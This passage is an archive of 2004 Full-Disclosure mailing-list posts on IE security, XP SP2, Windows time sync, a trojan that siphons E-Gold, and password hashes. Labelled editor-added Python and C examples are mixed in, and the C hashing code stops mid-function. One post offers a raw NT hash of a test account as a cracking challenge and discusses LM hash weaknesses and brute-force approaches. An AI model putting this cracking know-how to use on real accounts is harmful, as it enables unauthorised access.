etc ad nauseam" which this list in particular is SOOO good at. Some of the
people around here shouldn't be able to breathe they thump their own chest so
hard and so much. Many of the others have no clue what they are talking
about and simply reiterate anything they thought they heard that might be
bad that they heard from someone much brighter than them. 

  joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles
Sent: Tuesday, November 16, 2004 9:19 AM
To: joe; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE is just as safe as FireFox


Microsoft made a bold step by changing security in SP2. It was going to
break stuff...and it was stupid to see people yell about that. They told us
it would, we knew it would. I am glad to see they are starting to take steps
toward better systems, but Microsoft has room for improvement to say the
least.



RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-17 Thread joe
Well MS isn't about to produce code to configure Macs and other OSs,
wouldn't you say that makes sense? They certainly aren't the experts in
writing code for controlling those platforms and I don't see why they would
want to.
 
On the flip side there are other companies doing so. Take a look at
companies like Centrify and Vintela and what they are doing for *nix / *bsd
platforms and integration into Active Directory specifically for SECURE
authentication/authorization and policy management in a corporate
environment.
 
So once your favorite Solaris box can be configured via AD policies, does it
make it an ms toy as well?


  joe
 
--
Pro-Choice
Let me choose if I even want a browser loaded thanks!

 




From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of stephane
nasdrovisky
Sent: Tuesday, November 16, 2004 8:39 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE is just as safe as FireFox
 
 

Unfortunately, MS group policy does not handle Mac, Solaris, Linux, ... only MS
toys can be configured using this. 



RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-17 Thread joe
So are you saying you truly believe IE to be an integral part of the OS that
without it the OS would not be useable or would fail entirely and believe MS
implicitly or are you just trying to be a sassy PITA?

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!
 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gary E. Miller
Sent: Tuesday, November 16, 2004 2:09 PM
To: Todd Towles
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE is just as safe as FireFox



I suggest you re-read about the M$ anti-trust trial.  This was certainly NOT
the M$ legal position.




RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-17 Thread joe
I would rather not get too deep into this. But I think you are mixing the
ideas of good code with good documentation or possibly with good hard design
specs. 

In any project there are going to be things that aren't specifically
specified in the design that some other module could possibly take advantage
of. These are generally considered implementation details. For a basic
example, say you have a routine that takes a search filter and returns
information based on that filter. Let's say when the spec was written, no
thought of the ordering of the data to be returned was defined, it was
simply a matter of returning the correct data. Actually specifying the order
possibly wasn't important or overlooked. Some very high quality code was
written to the spec and the specific implementation detail ended up having
it so the data got returned in a way that was sorted by some field used in
the query or by some arbitrary value specific to the indexing. Someone
completely unrelated to the module, say someone who is using that module as
an API or as a server app notices that it always comes back sorted and
implements some stateless retrieval mechanism around it (I understand, this
is their F-U and they wrote bad code here because there are critical
untested assumptions). This works for years and years. Then some work is
done on the original code and that implementation detail changes and sort is
now done in a different way or not at all. Downstream modules dependent on
that until then well understood implementation detail implode. 

The original code was still high quality. Someone just used it in a way that
wasn't intended. It is these unintended uses of implementation details that
can really bite you and why YOU ALWAYS legacy test code that may be used by
something else. 

I don't think any spec will ever define out 100% what needs to go in and
what needs to come out and all of the possible implementation details that
could result. I think we can get close and assert the crap out of the input
and output based on what we expect and break out when it deviates. But this
is an expensive form of coding and I think impacts flexibility a little. 


Anyway, on the flip side you could have horrible spaghetti code that
conforms very well to a published spec as well. I would tend to agree that
normally that would be harder to work on (except for maybe the person who
originally wrote it) but want to put emphasis on the importance truly being
in the spec and data assertions. 

I completely agree that IE is too intertwined and it gives the appearance
that the OS needs it. It does need to be stripped back out or the piece that
allegedly has to be there for OS functionality needs to be stripped down to
very bare very basic pieces that disallows any extension or code execution.


  joe


--
Pro-Choice
Let me choose if I even want a browser loaded thanks!
 



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Eric Paynter
Sent: Tuesday, November 16, 2004 4:19 PM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE is just as safe as FireFox


But high quality code that has a sound and well documented architecture can
be more easily updated without messing up dependencies, whereas low quality
code can be a nightmare to find let alone correct even the most trivial bug.
There are always exceptions, but *in general*, it is easier (less effort,
faster turnaround) to maintain high quality code.

-Eric




RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-17 Thread joe
Ah thanks, that answers my question. :o)

On the MS defender comment. Well I can't say much other than not everyone
thinks that a company is entirely good or entirely bad. I have a more
granular outlook on things. Some things are done well, some things aren't.
That applies to all OSes. None of them do everything right. 

  joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!



-Original Message-
From: Gary E. Miller [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, November 17, 2004 5:24 PM
To: joe
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE is just as safe as FireFox


Yo Jo!

Who am I to tell Bill Gates he is a liar and a perjurer?  He and his
employees, under oath, said IE is an indivisible part of the OS.  So it must
be so. :-)

I do not have an opinion since I gave up WinBlows years ago.  Just seemed
odd to me that an M$ defender would not be going with the party line and
suggesting the IE is not part of the OS.  Sorta thought that was obvious
from the context which you deleted, but some people are clueless and can not
be helped.

RGDS
GARY
--
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
[EMAIL PROTECTED]  Tel:+1(541)382-8588 Fax: +1(541)382-8676

On Wed, 17 Nov 2004, joe wrote:

 So are you saying you truly believe IE to be an integral part of the 
 OS that without it the OS would not be useable or would fail entirely 
 and believe MS implicitly or are you just trying to be a sassy PITA?

 --
 Pro-Choice
 Let me choose if I even want a browser loaded thanks!


 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Gary E. 
 Miller
 Sent: Tuesday, November 16, 2004 2:09 PM
 To: Todd Towles
 Cc: [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] IE is just as safe as FireFox



 I suggest you re-read about the M$ anti-trust trial.  This was 
 certainly NOT the M$ legal position.







RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-15 Thread joe
I think that this corporate policy will have far more impact on your company
than on Microsoft. As more and more people and companies deploy XP2, it
makes me wonder if you should just consider leaving the Microsoft market
entirely. 

As to why it isn't on Windows Update... I would guess that is because not
everyone is running your software or software that is impacted by what you
are complaining about. I have been running XP2 on several machines for some
time now and have no issues with it on them. My work laptop isn't running
XP2 but that is simply because I am waiting for the corporate go ahead once
they finish regression testing all apps. I have a virtual machine on the
laptop running XP2 that I have been testing it with the corporate network
and everything seems to be fine there. 

My question would be, did your app break only on the final release or did
you guys just ignore the public beta figuring you didn't need to test your
product because it was, IYO, MS's responsibility to make sure you worked
after the update? Does your company as a whole feel attempts at securing
machines shouldn't be attempted by Microsoft? I am curious what this says
about your company's take on security.


  joe



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gregory Gilliss
Sent: Sunday, November 14, 2004 12:39 PM
To: [EMAIL PROTECTED]
Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

One comment about XP2 - the company where I work (which produces security
networking appliances) has a corporate policy - we do not support XP2. Sales
hates this (because all the numbnuts out there are pulling SP2 down with
autoupdate and they have no clue what they have brought upon themselves) but
since M$ was so idiotic as to disable the network functionality that allows
reverse proxies to function properly (and I'm not talking about Juniper's
back door where they pipe things straight through) it basically makes my
company's (and every other company's) product break.

The really dumb part is that M$ has a patch for their misdeeds and a
knowledge base article and everything - but it's not incorporated into
autoupdate. Wonder why they would not include that fix for SP2 in
autoupdate? Maybe they *want* to break other companies' products?
Nah ... G

G



RE: [Full-Disclosure] MSIE srcname property disclosure

2004-11-15 Thread joe
How is it an example?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dave Aitel
Sent: Monday, November 08, 2004 9:49 AM
To: Michal Zalewski
Cc: Berend-Jan Wever; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] MSIE srcname property disclosure

SNIP
WINS is a classic example.
SNIP



RE: [Full-Disclosure] MSIE srcname property disclosure

2004-11-15 Thread joe
I don't know how your club works. 

Do you report to MS as well or just within your club that you charge people
to be part of? Has MS responded to you if you did report it? What was their
response that makes WINS a classic example?

  joe 

-Original Message-
From: Dave Aitel [mailto:[EMAIL PROTECTED] 
Sent: Monday, November 15, 2004 3:38 PM
To: joe
Cc: 'Michal Zalewski'; 'Berend-Jan Wever'; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] MSIE srcname property disclosure

That's a good question for your Microsoft sales rep. If you want technical
details, Immunity has a working and reliable Wins exploit in the
Vulnerability Sharing Club version of CANVAS. I think there's an interesting
difference between how the Linux community handled the recent kernel bugs,
and how Microsoft and other commercial vendors handle all bugs.

Dave Aitel
Immunity, Inc.

joe wrote:

How is it an example?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dave Aitel
Sent: Monday, November 08, 2004 9:49 AM
To: Michal Zalewski
Cc: Berend-Jan Wever; [EMAIL PROTECTED]; 
[EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] MSIE srcname property disclosure

SNIP
WINS is a classic example.
SNIP





RE: [Full-Disclosure] XP vs 2K

2004-11-15 Thread joe
What in the event log is telling you Server service not running is causing
your BSODs? I run that way on 4 out of 6 XP machines here at home.

  joe 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
[EMAIL PROTECTED]
Sent: Monday, November 15, 2004 11:47 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] XP vs 2K

this) doesn't trust me to config the system the way
*I* want. For example, I decided one day to disable some services (server,
messenger, etc) for security, the same ones recommended to disable on any
win2k/xp machine exposed to the internet. So, all's going good and fine,
until i reboot. Now, XP gives me
(intermittently) a BSOD at startup! I check the system logs, and find that
the crashes were from server
service not being able to startup. very weird



RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-15 Thread joe
 Everytime a Firefox exploit comes out..there is already a fix...
 is that magic? No..it is good coding...

What? 

Having a quick fix out is due to low complexity of issue and assisted by a
lack of dependencies so you have reduced time for patching and testing. It
has nothing to do with code quality. I have seen some extremely good code
that hit an issue that took long periods of time to correct due to the
complexity of the issue with all of the requirements that had to be stacked
up to cause an issue. I have also seen crappy code that could be pretty
quickly patched up for various things and often contributed to how crappy it
was. Again, code quality and time to patch has nothing to do with each other
except if you had great code you wouldn't even have to worry about exploits
and patching. Great code, IMO, requires 100% assertions of all incoming data
and NO ONE does that. Programmers assume that incoming data will fit in a
specific range and go with it. At some point we as developers (some earlier
than others) learned that we should at least be checking for data length
though that still isn't the full assertion that should be done on the
quality and state of the data. One reason for not doing a full assertion is
for future flexibility, don't check the data too close so you don't have to
recompile for a new use. Mostly it is done because coders just don't think
someone will do something so off the wall or are too lazy or too pressed for
time to care.


Saying that, I agree, as I have stated many times on this list, that IE
needs to be backed down. If there has to be some piece of it that absolutely
has to be in the OS it should be a very basic very small very simple hello
world basic HTML only rendering capability - you get fonts and anchors and
not much more - it isn't even possible to execute anything even if the user
agrees with a signature in blood. The code being tiny and truly a part of
the OS in that it isn't possible to upgrade it to IE version x. It is
updated with OS updates. Code so small and tight and well controlled and
understood and practically memorized by the developers that MS could put a
monetary guarantee behind the ability to exploit it. Say HTTP-EQUIV gets $10
million if he finds a way to crack it and run remote exploit code with a
realistic POC.  

If someone wants a full function IE, they load that separately and it runs
in a sandbox as guest. Personally I never agreed that IE was truly part of
the OS. There are some artificial dependencies built in for some of the
display stuff like help, etc but NTFS and threading and all of that works
just fine without IE. 

If pulling IE out of the Explorer shell is too difficult, then I for one
would be fully behind a new secure type shell replacement for the Explorer
Shell. We had ProgMan Shell for several years then we got the Explorer
Shell. Maybe it is time to get a new shell, at least for servers. 

I was recently in Redmond and the message I kept feeding back over and over
again was that we needed a way to not have to load IE onto machines. I am
looking at moving ideas forward. If they give me the ability, I am not going
to whine why I can't do the same on Win9x or 2K or even XP. So many people
bitch on this list about MS supporting legacy stuff and then they or someone
else starts bitching that MS isn't back porting the changes. Pick one or the
other but keep in mind if things have to keep getting back ported, resources
for that aren't moving us forward. I myself, would rather move forward. 

  joe



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles
Sent: Friday, November 12, 2004 10:10 AM
To: Rafel Ivgi, The-Insider; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE is just as safe as FireFox

SNIP
 Everytime a Firefox exploit comes out..there is already a fix...is that
magic? No..it is good coding... 
SNIP

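An added example, not from this thread, serving both the implementation-detail story in the earlier post (a search whose result order was never part of the spec, and a stateless pager downstream that relied on it) and the point here about asserting incoming data: the record store, the `search_v1`/`search_v2` routines and the `MAX_FILTER_LEN` limit are all constructed for illustration.

```python
"""Added example (constructed). A search routine whose result order is an
implementation detail, a stateless pager that quietly depended on it, and
the input/output contract checks that make the dependency fail loudly
when the detail changes instead of serving wrong pages for years."""

MAX_FILTER_LEN = 64  # hypothetical limit; the point is that the spec states one

# Constructed store, deliberately not in alphabetical order.
RECORDS = {
    "zeta":  {"owner": "ops"},
    "alpha": {"owner": "dev"},
    "mu":    {"owner": "sec"},
    "beta":  {"owner": "dev"},
}


def check_filter(filter_text):
    """Assert the incoming data: type, length and character class, not just presence."""
    if not isinstance(filter_text, str):
        raise TypeError("filter must be a string")
    if not 1 <= len(filter_text) <= MAX_FILTER_LEN:
        raise ValueError("filter length out of range")
    if not filter_text.isprintable():
        raise ValueError("filter contains non-printable characters")
    return filter_text


def search_v1(filter_text):
    """Original implementation. It walks a sorted index, so matches happen to
    come back sorted by name. The spec only says 'return the matching names'."""
    check_filter(filter_text)
    return [name for name in sorted(RECORDS) if filter_text in name]


def search_v2(filter_text):
    """Later rewrite: walks the store in storage order. Still correct to the
    spec; the accidental ordering is gone."""
    check_filter(filter_text)
    return [name for name in RECORDS if filter_text in name]


def page_after(results, after, size):
    """Downstream stateless pager written against v1's accidental order:
    'the next `size` names greater than the last one I showed'. No check."""
    return [name for name in results if after is None or name > after][:size]


def is_sorted(seq):
    return all(a <= b for a, b in zip(seq, seq[1:]))


def page_after_checked(results, after, size):
    """Same pager with its precondition asserted, so a changed upstream detail
    raises here instead of producing duplicated or skipped pages."""
    if not is_sorted(results):
        raise AssertionError("pager requires sorted results; upstream contract changed")
    if size < 1:
        raise ValueError("page size must be positive")
    return page_after(results, after, size)


def walk_all_pages(results, size, pager=page_after):
    """Drive the pager to exhaustion and return every name it handed out.
    Terminates because `after` strictly increases on every page."""
    seen, after = [], None
    while True:
        page = pager(results, after, size)
        if not page:
            return seen
        seen.extend(page)
        after = page[-1]


def paging_is_consistent(results, size):
    """True only if paging yields each result exactly once."""
    seen = walk_all_pages(results, size)
    return len(seen) == len(set(seen)) and set(seen) == set(results)


if __name__ == "__main__":
    # v1 pages cleanly; v2 returns the same records but paging repeats "zeta".
    print(walk_all_pages(search_v1("a"), 2))
    print(walk_all_pages(search_v2("a"), 2))
```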


[Full-Disclosure] Troj/Banker-AJ

2004-11-11 Thread joe smith
Has anyone seen this in the wild?  I'm looking for a sample for 
analysis.  Please contact me off list.

http://www.sophos.com/virusinfo/analyses/trojbankeraj.html
http://news.com.com/Trojan+horse+spies+on+Web+banking/2100-7349_3-5448622.html?tag=nefd.top
TIA
J


[Full-Disclosure] Win32.Grams - E-Gold Account Siphoner

2004-11-06 Thread Joe Stewart
I've written up an analysis of the Win32.Grams trojan. It differs from 
previous E-Gold phishing trojans in that it doesn't steal credentials; it 
uses the victim's own browser to siphon all the E-Gold (well, almost all, it 
leaves them .004 grams) directly from their account to another E-Gold 
account, using OLE automation. This would completely bypass all the new 
authentication methods financial institutions are using to thwart keystroke 
loggers/password stealers, because the trojan simply lets the user do the 
authentication, then takes over from there.

Full analysis is here:
http://www.lurhq.com/grams.html

-Joe

-- 
Joe Stewart, GCIH 
Senior Security Researcher
LURHQ http://www.lurhq.com/



RE: [Full-Disclosure] Windows Time Synchronization - Best Practices

2004-10-22 Thread joe
 So right off the bat you know you are sacrificing something.  
 Why settle for less than the best when the best is free?

Two reasons. Say you don't need the full feature set of NTP and/or you
manage hundreds of thousands of machines globally and you don't want to have
to add something additional. 

Microsoft Windows Domains are, to my knowledge, the only systems out of the
box dependent on Kerberos. Time is extremely important for Kerberos and
extremely important for Windows Domains. I have seen many examples of the
Windows SNTP implementation working perfectly fine across very large
companies with several hundred thousand machines with no need to
install/manage any other software. These environments fall into the default
Windows Domain configuration of the members talking to their domain
controller for time and their domain controller going up the chain until you
get to the forest root PDC which takes its time from some defined time
source(s). Even if the defined time source isn't correct the entire forest
has the same wrong time which is actually more important for a majority of
the work done in a domain than having the exact right time. Additionally I
managed a Windows AD Domain environment with some 200,000+ Windows machines
for 4 years and almost never had to think about time because the built-in
Windows time system worked. The points I had to think about it were when
someone took it into their own hands and set their own time sources either
with the Windows software or with third party software and that time source
wasn't accurate. If the time is wrong across an entire forest that is almost
certainly the fault of the admins configuring the DCs or the vendor
consultants for the company not knowing what they are talking about - not a
failing in SNTP. 

If you take on one-off home PCs, people can do whatever they want for time.
Managing additional software on your home personal PC is extremely different
from doing it for tens or hundreds of thousands of machines across the
world. Additionally, if your home PC time is different from some other
machine, it usually won't impact your ability to logon to the local machine
because you are using the local PCs IDs though it could impact various other
secure transactions with other systems.


 Never heard of time.microsoft.com being down or incorrect.

 Me neither, but it has been unreachable.  Since the original requestor 
 was from Brazil I would think that reachability would be an issue for him.


time.microsoft.com is simply a default if nothing else is set. Change it,
that is extremely easy. 

 Yeah, but you are still stuck with only ONE server, you are stuck with SNTP
 and you have almost no way to tell if the time daemon is doing the right thing.

Incorrect on all accounts except you are using SNTP and you still haven't
shown a valid reason why that is bad. 

 
  joe


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gary E. Miller
Sent: Thursday, October 21, 2004 5:47 PM
To: Cushing, David
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Windows Time Synchronization - Best Practices

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yo David!

On Thu, 21 Oct 2004, Cushing, David wrote:

  In my experience NTP will work a lot better for you than Windows 
  Time server.

 Windows time service uses SNTP.

SNTP is RFC 2030, It says:

   SNTP can be used when the ultimate performance of the full
   NTP implementation described in RFC-1305 is not needed or justified.

So right off the bat you know you are sacrificing something.  Why settle for
less than the best when the best is free?

RFC 2030 Continues:

   It is strongly recommended that SNTP be used only at the extremities
   of the synchronization subnet. SNTP clients should operate only at
   the leaves (highest stratum) of the subnet and ...

   The full degree of reliability ordinarily expected of primary servers
   is possible only using the redundant sources, diverse subnet paths
   and crafted algorithms of a full NTP implementation. 

Seems to me that rules out using it to connect to the stratum 1 in Seattle,
WA from Brazil.

  The protocol is robust and you are not dependent on the single point 
  of failure called: time.microsoft.com.

 Never heard of time.microsoft.com being down or incorrect.

Me neither, but it has been unreachable.  Since the original requestor was
from Brazil I would think that reachability would be an issue for him.  Last
time I was monitoring reachability to Brazil there were often outages and
bottlenecks to there from the US.

 You can use 'net time' or regedit to change it.

 http://www.microsoft.com/windows2000/docs/wintimeserv.doc

Yeah, but you are still stuck with only ONE server, you are stuck with SNTP
and you have almost no way to tell if the time daemon is doing the right
thing.

With NTP you can designate a local master that gets its time from a diverse
set of sources.  It is easy to verify and monitor its proper

Re: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu? - OT

2004-10-21 Thread Joe Hood
We can only pray that al-Qaeda isn't as successful as they were in Spain.

It would have seemed there was enough controversy in the news about
the electronic voting machines for people not to use them but hey,
people probably still use IE.  It's interesting what is needed to sway
a people.

Joe Hood


On Fri, 22 Oct 2004 00:10:29 +1300, Nick FitzGerald
[EMAIL PROTECTED] wrote:
 Gregh ([EMAIL PROTECTED]) wrote:
 
  FYI - I know a lot of Americans FEEL that way but FYI once more, it
  isn't true to most people in the world.
 
 Well, speaking for clearly ignorant Ozzies such as yourself, you may
 well be correct -- after all, you're the folk who just re-elected, as
 your Prime Minister, the biggest Dubya-toadie outside of the White
 House and the Iraqi interim governing council (or whatever they
 masquerade as).
 
 Most of the non-US folk I've met in the last six months (and many US
 citizens too) are downright petrified of a Bush re-election.
 
  Please - can we take this OFF list now? Thanks.
 
 Had you followed your own advice by not posting your inflammatorily
 ignorant off-topic opinion, you would not have prompted this (and
 other) followups...
 
 Regards,
 
 Nick FitzGerald
 
 
 


RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!

2004-10-21 Thread joe
Well I don't think anyone is saying that the issue is that 128 character
passwords are being easily hacked so I am not quite sure I understand your
point about 256 characters and why you mention it. People seem to dislike
passwords greater than 14 characters let alone entering passwords of 150,
200, or 250 characters. To put it another way, if MS suddenly increased the
buffer to allow for hashing of passwords 1024 characters in size would you
push that MS was more secure based on that? I doubt it, I certainly
wouldn't.

BTW, I tried the link someone previously gave with the password hash I
previously posted and it is well under 128 characters and the web site
reported: 

Password: not found! 


  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Eric Paynter
Sent: Monday, October 18, 2004 1:32 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Senior M$ member says stop using passwords
completely!

On Sat, October 16, 2004 5:25 pm, Tim said:
 The reason for my post was to point out that Mr. Hensing doesn't 
 appear to be a reliable source of information on the topic of 
 passwords and hash security.

I think that much became apparent when Mr. Hensing took sarcastic shots at
Linux security (e.g. Attack easier targets like all those Linux boxes you
installed because its so much more secure . . .). Funny thing is, Linux
supports up to 256 character passwords by default - twice as long as
Windows.

-Eric

--
arctic bears - email and dns services
http://www.arcticbears.com



Re: [Full-Disclosure] RE: [Full-Disclosure] Open the doors to hell hire a hicker Full-Disclosure Posts

2004-10-19 Thread Joe Random
On Mon, 18 Oct 2004 10:28:39 -0400, Clairmont, Jan M
[EMAIL PROTECTED] wrote:
 Hire the burglar to secure your home,
 yeah right? Doh!
 
 Sheessh what a stupid idea?


How is it a stupid idea? 

*Looks confused*.



[Full-Disclosure] Re: Stupid idea

2004-10-19 Thread Joe Random
On Tue, 19 Oct 2004 12:11:04 -0600, [EMAIL PROTECTED]
[EMAIL PROTECTED] wrote:
 Just wanted to help you out in no-flame mode. The reason no one hires known
 burglars to secure their homes is that the occupation of burglars is to
 break into buildings and steal things.
 
 If this still seems unclear to you, hire someone who is out on bail
 awaiting trial on burglary charges to secure your home.


Yes, I would ask him to secure my home. I wouldn't get a jumped up
academic to do it, that's for sure. They wouldn't know the first place
to start and certainly wouldn't have a natural burglar way of
thinking.



Re: [Full-Disclosure] Re: Stupid idea

2004-10-19 Thread Joe Random
On Tue, 19 Oct 2004 17:52:54 -0400, Byron L. Sonne [EMAIL PROTECTED] wrote:
  [EMAIL PROTECTED] wrote:
 
 Carolyn Meinel! Hahaha... is she on this list?


Nar, it was a private e-mail... :-)



RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!

2004-10-18 Thread joe
I think Mr. Hensing was trying to tell people how to be more secure with
what they currently have. While I agree that added length doesn't
necessarily make a password theoretically stronger, a passphrase will tend
to be longer than 14 characters and push you past the storage of the lm hash
which has the chunking you described[1] and will most likely not be one of
the 50 or so most commonly used passwords making many of the little
automated crackers for viruses worthless. Plus if cracking a password of
10-12 words, the cracker best know that it is a passphrase versus a password
up front or else the cracking token used in the brute force will be
characters which will take a while or use some fairly large tables. 

Personally the part I didn't really agree with was forcing longer passwords
through the policy. I like the idea of forcing a longer password but not
through the Windows policy, but through a password filter so that a
machine/person can't query what the actual policy is. If you as a cracker
just know the password must be between 6 and 128 characters (or 1-128
characters) you can't really assume that a passphrase is being used. If you
encounter a policy set to 20-25 characters minimum it would be a rather good
guess that a pass phrase would be used so you can start using words as
tokens instead of characters and substantially narrow your tables or brute
force range. 

BTW, if you want, here is a password from one of my test ids. My policy on
my local machine requires a password of 6 characters or better. How long
does it take you to crack it? Brute force or table and if table how big of a
table?

testuser:1022:NO PASSWORD*:015ED52DE1744CE8352899BA93702E88:::


From the rest of your writing it seems you tore into it merely because you
don't like MS. Note that the blogs done by the MS employees are not
filtered/controlled by MS. They are just people who want to put out info
that will hopefully help the users and people working with the technology.
The fact that he made a recommendation of using a passphrase versus a
password wasn't a statement for or against salted hashes. He was, again,
telling people what to do to help with what they currently have. Far more
useful than a rant against something he has no control over as I'm sure if
he had the pull to make that change by saying the word, what I know of him
from other things I have read would tell me he probably would do it. You
trying to gauge his knowledge and capability based on a blog that you don't
think says what needs to be said is on par with me trying to gauge your
knowledge based on what you have written here. 

Quite honestly, the quality of password hashes in the Windows world is far
less an issue than the quality of passwords being used if they are being
used at all. The problems you point out for all internet users has nothing
to do with password hashes. The viruses to which I think you are alluding
don't crack passwords due to unsalted hashes, they crack simple easy
passwords people use through brute force attempts because they are weak and
the machines have disabled or weak password lockout policies or
alternatively walk through open doors on unpatched machines or most likely
are social engineering pieces that get some numbskull to click on things and
just run them. Whether they are done at the click or have to type in three
passwords and hop on one leg doesn't matter, some people will just do it so
they can see that picture of Britney Spears or get those instructions on
how to re-enable their account.

  joe



[1] This can also be done with policy/registry modification but it is dependent
on how much legacy support is required for a system. More than anything,
this legacy support really hurts MS's attempts to get more secure. MS has
historically bent to try and keep legacy systems functional, far more than
they should in my opinion. The latest SP for XP they didn't do this to the
extent they did in the past and the whining about it will be considered
legendary some day. 
  

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Tim
Sent: Saturday, October 16, 2004 8:25 PM
To: Micheal Espinola Jr
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Senior M$ member says stop using passwords
completely!

Hello Mr Espinola,

 That much is obvious.  Read the the full article, do a little 
 background research and get back to us when you reach a more sensible 
 conclusion.

The reason for my post was to point out that Mr. Hensing doesn't appear to
be a reliable source of information on the topic of passwords and hash
security.  If you haven't come to the same conclusion, perhaps you should do
more homework yourself.

 Reactionary conclusions based on obvious article 'skimming' make it 
 apparent you didn't do your homework before posting.

Pardon me for my reactionary style.  I am merely frustrated by M$'s
irresponsible business practices, and their unwillingness to correct
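
Worked example added by the editor to go with the two password posts above
(joe's point that a passphrase pushes past the 14-character LM limit and the
chunking into halves, and the later exchange about 128-character passwords).
It is not code from any post in the thread. It computes the NT hash for real
(MD4 over the UTF-16LE password, MD4 implemented inline and checked against the
well-known value for "password"), shows the LM preprocessing without the DES
step, and compares exhaustive-search work for the two. The 69-symbol LM and
95-symbol NT charsets, the 128-character cap and the sample passwords are
assumptions for illustration; nothing here touches the hash joe posted.

```c
/* Added example, not code from any post in this thread: what the Windows SAM
 * keeps for a password of a given length and why a passphrase longer than 14
 * characters changes the attacker's job. The NT hash (MD4 over the UTF-16LE
 * password) is computed for real with an inline MD4; for LM only the
 * preprocessing is shown, the DES step being beside the point here. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#define ROTL(x, n) (((x) << (n)) | ((x) >> (32 - (n))))
#define F(x, y, z) (((x) & (y)) | (~(x) & (z)))
#define G(x, y, z) (((x) & (y)) | ((x) & (z)) | ((y) & (z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))

/* One 64-byte MD4 compression step (RFC 1320); the four registers rotate. */
static void md4_block(uint32_t st[4], const uint8_t *p)
{
    static const int s1[4] = {3, 7, 11, 19}, s2[4] = {3, 5, 9, 13}, s3[4] = {3, 9, 11, 15};
    static const int k3[16] = {0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15};
    uint32_t X[16], a = st[0], b = st[1], c = st[2], d = st[3], t;
    for (int i = 0; i < 16; i++)
        X[i] = (uint32_t)p[4*i] | (uint32_t)p[4*i+1] << 8 |
               (uint32_t)p[4*i+2] << 16 | (uint32_t)p[4*i+3] << 24;
    for (int i = 0; i < 16; i++) { t = ROTL(a + F(b, c, d) + X[i], s1[i % 4]); a = d; d = c; c = b; b = t; }
    for (int i = 0; i < 16; i++) { t = ROTL(a + G(b, c, d) + X[(i % 4) * 4 + i / 4] + 0x5A827999u, s2[i % 4]); a = d; d = c; c = b; b = t; }
    for (int i = 0; i < 16; i++) { t = ROTL(a + H(b, c, d) + X[k3[i]] + 0x6ED9EBA1u, s3[i % 4]); a = d; d = c; c = b; b = t; }
    st[0] += a; st[1] += b; st[2] += c; st[3] += d;
}

void md4(const uint8_t *msg, size_t len, uint8_t out[16])
{
    uint32_t st[4] = {0x67452301u, 0xEFCDAB89u, 0x98BADCFEu, 0x10325476u};
    uint8_t blk[64];
    size_t i = 0, rem;
    for (; i + 64 <= len; i += 64) md4_block(st, msg + i);
    rem = len - i;
    memset(blk, 0, sizeof blk);
    memcpy(blk, msg + i, rem);
    blk[rem] = 0x80;                      /* pad: a 1 bit, zeros, 64-bit bit count */
    if (rem >= 56) { md4_block(st, blk); memset(blk, 0, sizeof blk); }
    for (int j = 0; j < 8; j++) blk[56 + j] = (uint8_t)(((uint64_t)len * 8) >> (8 * j));
    md4_block(st, blk);
    for (int j = 0; j < 16; j++) out[j] = (uint8_t)(st[j / 4] >> (8 * (j % 4)));
}

/* NT hash: MD4 of the password as UTF-16LE, returned as hex. ASCII input is
 * assumed and the thread's 128-character figure is used as the length cap. */
void nt_hash_hex(const char *pw, char out[33])
{
    uint8_t wide[256], h[16];
    size_t n = strlen(pw);
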